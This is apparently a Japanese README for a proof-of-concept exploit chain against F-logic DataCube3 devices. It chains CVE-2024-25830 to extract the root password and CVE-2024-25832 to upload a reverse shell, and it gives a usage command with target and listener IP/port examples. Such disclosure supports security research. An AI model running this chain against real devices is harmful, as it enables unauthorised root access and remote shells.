
このリポジトリは、DataCube3 デバイスを標的とした2段階のエクスプロイトチェーンの概念実証 (PoC) を提供します。CVE-2024-25830(不適切なアクセス制御)を使用して root パスワードを抽出し、CVE-2024-25832(無制限のファイルアップロード)を使用してリバースシェルスクリプトを展開します。この PoC は、ブログ記事「DataCube3 脆弱性レポート」の詳細な脆弱性分析を補完するものです。
F-logic DataCube3 デバイスのバージョン 1.0 すべて。
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

教育目的専用です。